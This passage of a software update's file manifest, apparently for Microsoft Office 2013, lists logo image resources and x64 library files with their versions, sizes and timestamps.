04:24 \nonenotelogo.contrastwhite_scale80.png| onenotelogo.contrast-white_scale-80.png| | 1345| 25-Jun-17| 04:24 \nonenotelogo.scale100.png| onenotelogo.scale-100.png| | 1636| 25-Jun-17| 04:24 \nonenotelogo.scale140.png| onenotelogo.scale-140.png| | 2268| 25-Jun-17| 04:24 \nonenotelogo.scale180.png| onenotelogo.scale-180.png| | 2945| 25-Jun-17| 04:24 \nonenotelogo.scale80.png| onenotelogo.scale-80.png| | 1398| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale100.png| onenotelogosmall.contrast-black_scale-100.png| | 1097| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale140.png| onenotelogosmall.contrast-black_scale-140.png| | 1311| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale180.png| onenotelogosmall.contrast-black_scale-180.png| | 1803| 25-Jun-17| 04:24 \nonenotelogosmall.contrastblack_scale80.png| onenotelogosmall.contrast-black_scale-80.png| | 711| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale100.png| onenotelogosmall.contrast-white_scale-100.png| | 1099| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale140.png| onenotelogosmall.contrast-white_scale-140.png| | 1303| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale180.png| onenotelogosmall.contrast-white_scale-180.png| | 1808| 25-Jun-17| 04:24 \nonenotelogosmall.contrastwhite_scale80.png| onenotelogosmall.contrast-white_scale-80.png| | 709| 25-Jun-17| 04:24 \nonenotelogosmall.scale100.png| onenotelogosmall.scale-100.png| | 1196| 25-Jun-17| 04:24 \nonenotelogosmall.scale140.png| onenotelogosmall.scale-140.png| | 1388| 25-Jun-17| 04:24 \nonenotelogosmall.scale180.png| onenotelogosmall.scale-180.png| | 1806| 25-Jun-17| 04:24 \nonenotelogosmall.scale80.png| onenotelogosmall.scale-80.png| | 811| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale100.png| onenotemlogo.contrast-black_scale-100.png| | 2922| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale140.png| onenotemlogo.contrast-black_scale-140.png| | 4102| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale180.png| onenotemlogo.contrast-black_scale-180.png| | 5917| 25-Jun-17| 04:24 \nonenotemlogo.contrastblack_scale80.png| onenotemlogo.contrast-black_scale-80.png| | 2001| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale100.png| onenotemlogo.contrast-white_scale-100.png| | 2890| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale140.png| onenotemlogo.contrast-white_scale-140.png| | 4074| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale180.png| onenotemlogo.contrast-white_scale-180.png| | 5879| 25-Jun-17| 04:24 \nonenotemlogo.contrastwhite_scale80.png| onenotemlogo.contrast-white_scale-80.png| | 2004| 25-Jun-17| 04:24 \nonenotemlogo.scale100.png| onenotemlogo.scale-100.png| | 3005| 25-Jun-17| 04:24 \nonenotemlogo.scale140.png| onenotemlogo.scale-140.png| | 4287| 25-Jun-17| 04:24 \nonenotemlogo.scale180.png| onenotemlogo.scale-180.png| | 5769| 25-Jun-17| 04:24 \nonenotemlogo.scale80.png| onenotemlogo.scale-80.png| | 2156| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale100.png| onenotemlogosmall.contrast-black_scale-100.png| | 1801| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale140.png| onenotemlogosmall.contrast-black_scale-140.png| | 2602| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale180.png| onenotemlogosmall.contrast-black_scale-180.png| | 3594| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastblack_scale80.png| onenotemlogosmall.contrast-black_scale-80.png| | 1130| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale100.png| onenotemlogosmall.contrast-white_scale-100.png| | 1790| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale140.png| onenotemlogosmall.contrast-white_scale-140.png| | 2583| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale180.png| onenotemlogosmall.contrast-white_scale-180.png| | 3554| 25-Jun-17| 04:24 \nonenotemlogosmall.contrastwhite_scale80.png| onenotemlogosmall.contrast-white_scale-80.png| | 1119| 25-Jun-17| 04:24 \nonenotemlogosmall.scale100.png| onenotemlogosmall.scale-100.png| | 1913| 25-Jun-17| 04:24 \nonenotemlogosmall.scale140.png| onenotemlogosmall.scale-140.png| | 2718| 25-Jun-17| 04:24 \nonenotemlogosmall.scale180.png| onenotemlogosmall.scale-180.png| | 3598| 25-Jun-17| 04:24 \nonenotemlogosmall.scale80.png| onenotemlogosmall.scale-80.png| | 1234| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale100.png| outlooklogo.contrast-black_scale-100.png| | 1929| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale140.png| outlooklogo.contrast-black_scale-140.png| | 3091| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale180.png| outlooklogo.contrast-black_scale-180.png| | 4084| 25-Jun-17| 04:24 \noutlooklogo.contrastblack_scale80.png| outlooklogo.contrast-black_scale-80.png| | 1574| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale100.png| outlooklogo.contrast-white_scale-100.png| | 1895| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale140.png| outlooklogo.contrast-white_scale-140.png| | 3096| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale180.png| outlooklogo.contrast-white_scale-180.png| | 4096| 25-Jun-17| 04:24 \noutlooklogo.contrastwhite_scale80.png| outlooklogo.contrast-white_scale-80.png| | 1541| 25-Jun-17| 04:24 \noutlooklogo.scale100.png| outlooklogo.scale-100.png| | 2093| 25-Jun-17| 04:24 \noutlooklogo.scale140.png| outlooklogo.scale-140.png| | 3241| 25-Jun-17| 04:24 \noutlooklogo.scale180.png| outlooklogo.scale-180.png| | 4038| 25-Jun-17| 04:24 \noutlooklogo.scale80.png| outlooklogo.scale-80.png| | 1705| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale100.png| outlooklogosmall.contrast-black_scale-100.png| | 1270| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale140.png| outlooklogosmall.contrast-black_scale-140.png| | 1597| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale180.png| outlooklogosmall.contrast-black_scale-180.png| | 2523| 25-Jun-17| 04:24 \noutlooklogosmall.contrastblack_scale80.png| outlooklogosmall.contrast-black_scale-80.png| | 918| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale100.png| outlooklogosmall.contrast-white_scale-100.png| | 1268| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale140.png| outlooklogosmall.contrast-white_scale-140.png| | 1547| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale180.png| outlooklogosmall.contrast-white_scale-180.png| | 2449| 25-Jun-17| 04:24 \noutlooklogosmall.contrastwhite_scale80.png| outlooklogosmall.contrast-white_scale-80.png| | 902| 25-Jun-17| 04:24 \noutlooklogosmall.scale100.png| outlooklogosmall.scale-100.png| | 1481| 25-Jun-17| 04:24 \noutlooklogosmall.scale140.png| outlooklogosmall.scale-140.png| | 1838| 25-Jun-17| 04:24 \noutlooklogosmall.scale180.png| outlooklogosmall.scale-180.png| | 2731| 25-Jun-17| 04:24 \noutlooklogosmall.scale80.png| outlooklogosmall.scale-80.png| | 1053| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale100.png| powerpntlogo.contrast-black_scale-100.png| | 1654| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale140.png| powerpntlogo.contrast-black_scale-140.png| | 2314| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale180.png| powerpntlogo.contrast-black_scale-180.png| | 3077| 25-Jun-17| 04:24 \npowerpntlogo.contrastblack_scale80.png| powerpntlogo.contrast-black_scale-80.png| | 1280| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale100.png| powerpntlogo.contrast-white_scale-100.png| | 1650| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale140.png| powerpntlogo.contrast-white_scale-140.png| | 2348| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale180.png| powerpntlogo.contrast-white_scale-180.png| | 3059| 25-Jun-17| 04:24 \npowerpntlogo.contrastwhite_scale80.png| powerpntlogo.contrast-white_scale-80.png| | 1259| 25-Jun-17| 04:24 \npowerpntlogo.scale100.png| powerpntlogo.scale-100.png| | 1721| 25-Jun-17| 04:24 \npowerpntlogo.scale140.png| powerpntlogo.scale-140.png| | 2348| 25-Jun-17| 04:24 \npowerpntlogo.scale180.png| powerpntlogo.scale-180.png| | 3023| 25-Jun-17| 04:24 \npowerpntlogo.scale80.png| powerpntlogo.scale-80.png| | 1354| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale100.png| powerpntlogosmall.contrast-black_scale-100.png| | 1026| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale140.png| powerpntlogosmall.contrast-black_scale-140.png| | 1364| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale180.png| powerpntlogosmall.contrast-black_scale-180.png| | 1894| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastblack_scale80.png| powerpntlogosmall.contrast-black_scale-80.png| | 746| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale100.png| powerpntlogosmall.contrast-white_scale-100.png| | 1022| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale140.png| powerpntlogosmall.contrast-white_scale-140.png| | 1307| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale180.png| powerpntlogosmall.contrast-white_scale-180.png| | 1874| 25-Jun-17| 04:24 \npowerpntlogosmall.contrastwhite_scale80.png| powerpntlogosmall.contrast-white_scale-80.png| | 758| 25-Jun-17| 04:24 \npowerpntlogosmall.scale100.png| powerpntlogosmall.scale-100.png| | 1154| 25-Jun-17| 04:24 \npowerpntlogosmall.scale140.png| powerpntlogosmall.scale-140.png| | 1438| 25-Jun-17| 04:24 \npowerpntlogosmall.scale180.png| powerpntlogosmall.scale-180.png| | 1896| 25-Jun-17| 04:24 \npowerpntlogosmall.scale80.png| powerpntlogosmall.scale-80.png| | 874| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale100.png| spdesignlogo.contrast-black_scale-100.png| | 1559| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale140.png| spdesignlogo.contrast-black_scale-140.png| | 2383| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale180.png| spdesignlogo.contrast-black_scale-180.png| | 3497| 25-Jun-17| 04:24 \nspdesignlogo.contrastblack_scale80.png| spdesignlogo.contrast-black_scale-80.png| | 1298| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale100.png| spdesignlogo.contrast-white_scale-100.png| | 1548| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale140.png| spdesignlogo.contrast-white_scale-140.png| | 2534| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale180.png| spdesignlogo.contrast-white_scale-180.png| | 3725| 25-Jun-17| 04:24 \nspdesignlogo.contrastwhite_scale80.png| spdesignlogo.contrast-white_scale-80.png| | 1298| 25-Jun-17| 04:24 \nspdesignlogo.scale100.png| spdesignlogo.scale-100.png| | 2163| 25-Jun-17| 04:24 \nspdesignlogo.scale140.png| spdesignlogo.scale-140.png| | 3058| 25-Jun-17| 04:24 \nspdesignlogo.scale180.png| spdesignlogo.scale-180.png| | 4614| 25-Jun-17| 04:24 \nspdesignlogo.scale80.png| spdesignlogo.scale-80.png| | 1745| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale100.png| spdesignlogosmall.contrast-black_scale-100.png| | 1008| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale140.png| spdesignlogosmall.contrast-black_scale-140.png| | 1278| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale180.png| spdesignlogosmall.contrast-black_scale-180.png| | 1990| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastblack_scale80.png| spdesignlogosmall.contrast-black_scale-80.png| | 617| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale100.png| spdesignlogosmall.contrast-white_scale-100.png| | 977| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale140.png| spdesignlogosmall.contrast-white_scale-140.png| | 1193| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale180.png| spdesignlogosmall.contrast-white_scale-180.png| | 1876| 25-Jun-17| 04:24 \nspdesignlogosmall.contrastwhite_scale80.png| spdesignlogosmall.contrast-white_scale-80.png| | 602| 25-Jun-17| 04:24 \nspdesignlogosmall.scale100.png| spdesignlogosmall.scale-100.png| | 1546| 25-Jun-17| 04:24 \nspdesignlogosmall.scale140.png| spdesignlogosmall.scale-140.png| | 1910| 25-Jun-17| 04:24 \nspdesignlogosmall.scale180.png| spdesignlogosmall.scale-180.png| | 2614| 25-Jun-17| 04:24 \nspdesignlogosmall.scale80.png| spdesignlogosmall.scale-80.png| | 1003| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale100.png| visiologo.contrast-black_scale-100.png| | 1804| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale140.png| visiologo.contrast-black_scale-140.png| | 3195| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale180.png| visiologo.contrast-black_scale-180.png| | 3478| 25-Jun-17| 04:24 \nvisiologo.contrastblack_scale80.png| visiologo.contrast-black_scale-80.png| | 1474| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale100.png| visiologo.contrast-white_scale-100.png| | 1801| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale140.png| visiologo.contrast-white_scale-140.png| | 3254| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale180.png| visiologo.contrast-white_scale-180.png| | 3626| 25-Jun-17| 04:24 \nvisiologo.contrastwhite_scale80.png| visiologo.contrast-white_scale-80.png| | 1447| 25-Jun-17| 04:24 \nvisiologo.scale100.png| visiologo.scale-100.png| | 1872| 25-Jun-17| 04:24 \nvisiologo.scale140.png| visiologo.scale-140.png| | 3262| 25-Jun-17| 04:24 \nvisiologo.scale180.png| visiologo.scale-180.png| | 3403| 25-Jun-17| 04:24 \nvisiologo.scale80.png| visiologo.scale-80.png| | 1526| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale100.png| visiologosmall.contrast-black_scale-100.png| | 1196| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale140.png| visiologosmall.contrast-black_scale-140.png| | 1497| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale180.png| visiologosmall.contrast-black_scale-180.png| | 2675| 25-Jun-17| 04:24 \nvisiologosmall.contrastblack_scale80.png| visiologosmall.contrast-black_scale-80.png| | 848| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale100.png| visiologosmall.contrast-white_scale-100.png| | 1165| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale140.png| visiologosmall.contrast-white_scale-140.png| | 1453| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale180.png| visiologosmall.contrast-white_scale-180.png| | 2618| 25-Jun-17| 04:24 \nvisiologosmall.contrastwhite_scale80.png| visiologosmall.contrast-white_scale-80.png| | 836| 25-Jun-17| 04:24 \nvisiologosmall.scale100.png| visiologosmall.scale-100.png| | 1285| 25-Jun-17| 04:24 \nvisiologosmall.scale140.png| visiologosmall.scale-140.png| | 1597| 25-Jun-17| 04:24 \nvisiologosmall.scale180.png| visiologosmall.scale-180.png| | 2722| 25-Jun-17| 04:24 \nvisiologosmall.scale80.png| visiologosmall.scale-80.png| | 960| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale100.png| winprojlogo.contrast-black_scale-100.png| | 1662| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale140.png| winprojlogo.contrast-black_scale-140.png| | 2705| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale180.png| winprojlogo.contrast-black_scale-180.png| | 3391| 25-Jun-17| 04:24 \nwinprojlogo.contrastblack_scale80.png| winprojlogo.contrast-black_scale-80.png| | 1393| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale100.png| winprojlogo.contrast-white_scale-100.png| | 1698| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale140.png| winprojlogo.contrast-white_scale-140.png| | 2737| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale180.png| winprojlogo.contrast-white_scale-180.png| | 3396| 25-Jun-17| 04:24 \nwinprojlogo.contrastwhite_scale80.png| winprojlogo.contrast-white_scale-80.png| | 1392| 25-Jun-17| 04:24 \nwinprojlogo.scale100.png| winprojlogo.scale-100.png| | 1740| 25-Jun-17| 04:24 \nwinprojlogo.scale140.png| winprojlogo.scale-140.png| | 2642| 25-Jun-17| 04:24 \nwinprojlogo.scale180.png| winprojlogo.scale-180.png| | 3257| 25-Jun-17| 04:24 \nwinprojlogo.scale80.png| winprojlogo.scale-80.png| | 1514| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale100.png| winprojlogosmall.contrast-black_scale-100.png| | 1124| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale140.png| winprojlogosmall.contrast-black_scale-140.png| | 1430| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale180.png| winprojlogosmall.contrast-black_scale-180.png| | 2183| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastblack_scale80.png| winprojlogosmall.contrast-black_scale-80.png| | 721| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale100.png| winprojlogosmall.contrast-white_scale-100.png| | 1119| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale140.png| winprojlogosmall.contrast-white_scale-140.png| | 1380| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale180.png| winprojlogosmall.contrast-white_scale-180.png| | 2148| 25-Jun-17| 04:24 \nwinprojlogosmall.contrastwhite_scale80.png| winprojlogosmall.contrast-white_scale-80.png| | 711| 25-Jun-17| 04:24 \nwinprojlogosmall.scale100.png| winprojlogosmall.scale-100.png| | 1308| 25-Jun-17| 04:24 \nwinprojlogosmall.scale140.png| winprojlogosmall.scale-140.png| | 1461| 25-Jun-17| 04:24 \nwinprojlogosmall.scale180.png| winprojlogosmall.scale-180.png| | 2189| 25-Jun-17| 04:24 \nwinprojlogosmall.scale80.png| winprojlogosmall.scale-80.png| | 855| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale100.png| winwordlogo.contrast-black_scale-100.png| | 1668| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale140.png| winwordlogo.contrast-black_scale-140.png| | 1984| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale180.png| winwordlogo.contrast-black_scale-180.png| | 3061| 25-Jun-17| 04:24 \nwinwordlogo.contrastblack_scale80.png| winwordlogo.contrast-black_scale-80.png| | 1385| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale100.png| winwordlogo.contrast-white_scale-100.png| | 1663| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale140.png| winwordlogo.contrast-white_scale-140.png| | 1979| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale180.png| winwordlogo.contrast-white_scale-180.png| | 3067| 25-Jun-17| 04:24 \nwinwordlogo.contrastwhite_scale80.png| winwordlogo.contrast-white_scale-80.png| | 1386| 25-Jun-17| 04:24 \nwinwordlogo.scale100.png| winwordlogo.scale-100.png| | 1784| 25-Jun-17| 04:24 \nwinwordlogo.scale140.png| winwordlogo.scale-140.png| | 2165| 25-Jun-17| 04:24 \nwinwordlogo.scale180.png| winwordlogo.scale-180.png| | 3187| 25-Jun-17| 04:24 \nwinwordlogo.scale80.png| winwordlogo.scale-80.png| | 1435| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale100.png| winwordlogosmall.contrast-black_scale-100.png| | 1152| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale140.png| winwordlogosmall.contrast-black_scale-140.png| | 1422| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale180.png| winwordlogosmall.contrast-black_scale-180.png| | 1619| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastblack_scale80.png| winwordlogosmall.contrast-black_scale-80.png| | 845| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale100.png| winwordlogosmall.contrast-white_scale-100.png| | 1156| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale140.png| winwordlogosmall.contrast-white_scale-140.png| | 1409| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale180.png| winwordlogosmall.contrast-white_scale-180.png| | 1605| 25-Jun-17| 04:24 \nwinwordlogosmall.contrastwhite_scale80.png| winwordlogosmall.contrast-white_scale-80.png| | 832| 25-Jun-17| 04:24 \nwinwordlogosmall.scale100.png| winwordlogosmall.scale-100.png| | 1219| 25-Jun-17| 04:24 \nwinwordlogosmall.scale140.png| winwordlogosmall.scale-140.png| | 1490| 25-Jun-17| 04:24 \nwinwordlogosmall.scale180.png| winwordlogosmall.scale-180.png| | 1706| 25-Jun-17| 04:24 \nwinwordlogosmall.scale80.png| winwordlogosmall.scale-80.png| | 881| 25-Jun-17| 04:24 \nresources.pri| resources.pri| | 47040| 25-Jun-17| 04:24 \nmso.tpn.txt.arm| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nmso.tpn.txt.x64| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nmso.tpn.txt.x86| mso_third_party_notices.txt| | 1814| 25-Jun-17| 04:24 \nFor all supported x64-based versions of Office 2013File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 15.0.4937.1000| 1051848| 25-Jun-17| 04:24 \nmsointl.dll.x64.1025| msointl.dll| 15.0.4945.1001| 4368640| 26-Jun-17| 08:27 \nmsointl.dll.x64.1026| msointl.dll| 15.0.4945.1001| 3268864| 26-Jun-17| 08:27 \nmsointl.dll.x64.1029| msointl.dll| 15.0.4945.1001| 3263744| 26-Jun-17| 08:27 \nmsointl.dll.x64.1030| msointl.dll| 15.0.4945.1001| 3049216| 26-Jun-17| 08:27 \nmsointl.dll.x64.1031| msointl.dll| 15.0.4945.1001| 3208960| 26-Jun-17| 08:26 \nmsointl.dll.x64.1032| msointl.dll| 15.0.4945.1001| 3631360| 26-Jun-17| 08:27 \nmsointl.dll.x64.3082| msointl.dll| 15.0.4945.1001| 3237632| 26-Jun-17| 08:26 \nmsointl.dll.x64.1061| msointl.dll| 15.0.4945.1001| 3026688| 26-Jun-17| 08:27 \nmsointl.dll.x64.1035| msointl.dll| 15.0.4945.1001| 3042048| 26-Jun-17| 08:27 \nmsointl.dll.x64.1036| msointl.dll| 15.0.4945.1001| 3896592| 26-Jun-17| 08:26 \nmsointl.dll.x64.1037| msointl.dll| 15.0.4945.1001| 4156616| 26-Jun-17| 08:27 \nmsointl.dll.x64.1081| msointl.dll| 15.0.4945.1001| 3118336| 26-Jun-17| 08:27 \nmsointl.dll.x64.1050| msointl.dll| 15.0.4945.1001| 3129592| 26-Jun-17| 08:27 \nmsointl.dll.x64.1038| msointl.dll| 15.0.4945.1001| 3320064| 26-Jun-17| 08:27 \nmsointl.dll.x64.1057| msointl.dll| 15.0.4945.1001| 2837752| 26-Jun-17| 08:27 \nmsointl.dll.x64.1040| msointl.dll| 15.0.4945.1001| 3156224| 26-Jun-17| 08:26 \nmsointl.dll.x64.1041| msointl.dll| 15.0.4945.1001| 3118848| 26-Jun-17| 08:26 \nmsointl.dll.x64.1087| msointl.dll| 15.0.4945.1001| 3313920| 26-Jun-17| 08:27 \nmsointl.dll.x64.1042| msointl.dll| 15.0.4945.1001| 3789568| 26-Jun-17| 08:26 \nmsointl.dll.x64.1063| msointl.dll| 15.0.4945.1001| 3270912| 26-Jun-17| 08:27 \nmsointl.dll.x64.1062| msointl.dll| 15.0.4945.1001| 3236608| 26-Jun-17| 08:27 \nmsointl.dll.x64.1086| msointl.dll| 15.0.4945.1001| 2856704| 26-Jun-17| 08:27 \nmsointl.dll.x64.1044| msointl.dll| 15.0.4945.1001| 2963200| 26-Jun-17| 08:27 \nmsointl.dll.x64.1043| msointl.dll| 15.0.4945.1001| 3124480| 26-Jun-17| 08:27 \nmsointl.dll.x64.1045| msointl.dll| 15.0.4945.1001| 3351296| 26-Jun-17| 08:27 \nmsointl.dll.x64.1046| msointl.dll| 15.0.4945.1001| 3156224| 26-Jun-17| 08:27 \nmsointl.dll.x64.2070| msointl.dll| 15.0.4945.1001| 3181312| 26-Jun-17| 08:27 \nmsointl.dll.x64.1048| msointl.dll| 15.0.4945.1001| 3296512| 26-Jun-17| 08:27 \nmsointl.dll.x64.1049| msointl.dll| 15.0.4945.1001| 3311360| 26-Jun-17| 08:27 \nmsointl.dll.x64.1051| msointl.dll| 15.0.4945.1001| 3310848| 26-Jun-17| 08:27 \nmsointl.dll.x64.1060| msointl.dll| 15.0.4945.1001| 3124480| 26-Jun-17| 08:27 \nmsointl.dll.x64.2074| msointl.dll| 15.0.4945.1001| 3166464| 26-Jun-17| 08:27 \nmsointl.dll.x64.1053| msointl.dll| 15.0.4945.1001| 3010816| 26-Jun-17| 08:27 \nmsointl.dll.x64.1054| msointl.dll| 15.0.4945.1001| 2958592| 26-Jun-17| 08:27 \nmsointl.dll.x64.1055| msointl.dll| 15.0.4945.1001| 3180792| 26-Jun-17| 08:27 \nmsointl.dll.x64.1058| msointl.dll| 15.0.4945.1001| 3291392| 26-Jun-17| 08:27 \nmsointl.dll.x64.1066| msointl.dll| 15.0.4945.1001| 3300608| 26-Jun-17| 08:27 \nmsointl.dll.x64.2052| msointl.dll| 15.0.4945.1001| 3135688| 26-Jun-17| 08:26 \nmsointl.dll.x64.1028| msointl.dll| 15.0.4945.1001| 3207880| 26-Jun-17| 08:26 \nmsointl.dll.x64.1033| msointl.dll| 15.0.4897.1000| 3844352| 25-Jun-17| 04:24 \nmso.dll.x64| mso.dll| 15.0.4945.1001| 37559040| 25-Jun-17| 04:24 \nxlsrv.ecs.mso.dll| mso.dll| 15.0.4945.1001| 37559040| 25-Jun-17| 04:24 \nconversion.office.msores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nmsores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nppt.conversion.msores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nppt.edit.msores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nwac.office.msores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \noffice.dll| office.dll| 15.0.4945.1000| 466632| 25-Jun-17| 04:24 \nacmcompanion.mso.dll| mso.dll| 15.0.4945.1001| 26942720| | \nmso.dll.x86| mso.dll| 15.0.4945.1001| 26942720| 25-Jun-17| 04:24 \nmsores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nmsores.dll.x86| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:27 \nmsosqm.exe| msosqm.exe| 15.0.4919.1000| 663784| 25-Jun-17| 04:24 \nmsointl.rest.idx_dll.x64.1025| msointl.rest.idx_dll| 15.0.4859.1000| 1499840| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1026| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1026| msointl.rest.idx_dll| 15.0.4859.1000| 1503432| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1029| msointl.dll.idx_dll| 15.0.4454.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1029| msointl.rest.idx_dll| 15.0.4859.1000| 1468608| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1030| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1030| msointl.rest.idx_dll| 15.0.4945.1000| 1464512| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1031| msointl.rest.idx_dll| 15.0.4859.1000| 1470656| 26-Jun-17| 08:26 \nmsointl.dll.idx_dll.x64.1032| msointl.dll.idx_dll| 15.0.4448.1000| 52816| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1032| msointl.rest.idx_dll| 15.0.4859.1000| 1476288| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1033| msointl.rest.idx_dll| 15.0.4853.1000| 1493760| 25-Jun-17| 04:24 \nmsointl.rest.idx_dll.x64.3082| msointl.rest.idx_dll| 15.0.4859.1000| 1479368| 26-Jun-17| 08:26 \nmsointl.dll.idx_dll.x64.1061| msointl.dll.idx_dll| 15.0.4463.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1061| msointl.rest.idx_dll| 15.0.4859.1000| 1475264| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1035| msointl.dll.idx_dll| 15.0.4445.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1035| msointl.rest.idx_dll| 15.0.4945.1000| 1465032| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1036| msointl.rest.idx_dll| 15.0.4885.1000| 1476800| 26-Jun-17| 08:26 